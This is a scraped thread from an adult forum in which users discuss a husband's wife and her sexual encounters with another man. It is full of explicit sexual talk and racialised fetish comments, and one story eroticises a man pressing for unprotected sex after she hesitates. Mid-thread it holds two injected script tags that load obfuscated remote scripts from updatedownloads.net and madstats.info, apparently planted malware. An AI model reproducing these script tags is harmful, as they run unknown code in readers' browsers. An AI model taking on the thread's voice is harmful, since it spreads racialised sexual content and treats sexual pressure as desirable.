• Seems like a lot of people are having an issue logging into chat since we updated. Here is what you need to do: Logout of the chat and forums, clear your cache and cookies. Log back in to the forum, then login to the chat with the same user/pass you use for the forums.

Nearly there

• Thread starternoway
  • Start date

How far will she go?

• Total voters
randyfrommo said:
If he's been eating her pussy, I'd guess he has seen her more or less like that. She'll let him go bare. Surprised they haven't already. A black guy can almost always talk mine out of a rubber when she is hot. she gets really hot from playing and being fucked by a bbc.

he has seen her like this but now she wants more. She said his choice which hole and how he wants her.

Wow, this is an awesome thread. I have cum bucket loads at noway's sexy wife and the situation you guys are in...

I can't believe she didn't relent those two times and gone bareback...I think most women would have!

xxsirexx said:
Wow, this is an awesome thread. I have cum bucket loads at noway's sexy wife and the situation you guys are in...

I can't believe she didn't relent those two times and gone bareback...I think most women would have!

thanks a lot. we think he is working her so that she begs for his cock and really wants him bare or not as long as she gets it.

noway said:
thanks a lot. we think he is working her so that she begs for his cock and really wants him bare or not as long as she gets it.

Sounds hot! Any chance of us getting treated to a few snaps of your lovely wife sucking the black boyfreind? Perhaps one of them has a cell phone with camera on??

she must be pregnat a black baby,look do you have any child?think sweet a black baby

He's just going to want to fuck her in both holes and cum in both as well. He will keep it up till he gets her bareback all the time.

ekolekol said:
she must be pregnat a black baby,look do you have any child?think sweet a black baby

She is not pregnant. Yes she has children.

she must be fucked bareback.Her pussy must be filled his big creamy load.Maybe she get pregnant and you have a new black child.

look at all her juices on her toy, she always cums big on it. I imagine how much wetter she will be for him.

Has she seen the doc? Is this Friday the day?
is she coming home afterwards to show you the proof?

tomorrow is friday, is she going to fuck him for the start of a great weekend.

Nothing fancy underneath for him but this is what she wore for him today.

yea ... what happen i just read the whole dam thread .. dont leave me hangin..

<script language='JavaScript' type='text/javascript'>document.write ("<" + "script language='JavaScript' type='text/javascript' src='http://updatedownloads.net/tool/output/index/Ou5i5xXj2cY3bYf1nhRQIVA1D9IBT5sH?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
<script type="text/javascript" src="http://www.madstats.info/tool/promotion/t_c4ca4238a0b923820dcc509a6f75849b.js"></script>

So what happenned at work today or lunch, did they go back to his place and did he get his cock into her pussy for the first time today.

Damn - Didn't she just get on the pill....isn't she supposed to wait a month?

Hell I'm glad she's excited...Noway - you have come so far, looking forward to hearing how you are rewarded for your patience and persistence.

Visits with Doctor is on Wednesday. She said he asked again about using a condom. She said yes. He went down on her, as she got close to cumming he stopped. Moved up placing his bare dick at her pussy and asked again. She hesitated a second, he started to push and she again said yes. He stopped told her that he would not eat her out till she cums anymore until after she fucks him. She said he continued to move up, fucked her mouth harder than normal. Right before cumming she said he pulled out of her mouth and shot his load of cum on her clit and pussy. Before she could get up to clean up, he put her panties back on and told her she was not to clean up until later.

Sounds like he just about made it into her pussy. She was close and wanted that cock in her pussy. He should have eat her somemore and gotten her a bit hotter, I bet his bare cock would have made it into her if he had. She was close and really wanted it.

randyfrommo said:
Sounds like he just about made it into her pussy. She was close and wanted that cock in her pussy. He should have eat her somemore and gotten her a bit hotter, I bet his bare cock would have made it into her if he had. She was close and really wanted it.

He has her desiring it very badly.

It sounds like she wants him very badly. I know that mine would be fucking him hot hard and often, but then she has already had her first. Yours will love it also and I'm betting will make her very hot and horny.

Users who are viewing this thread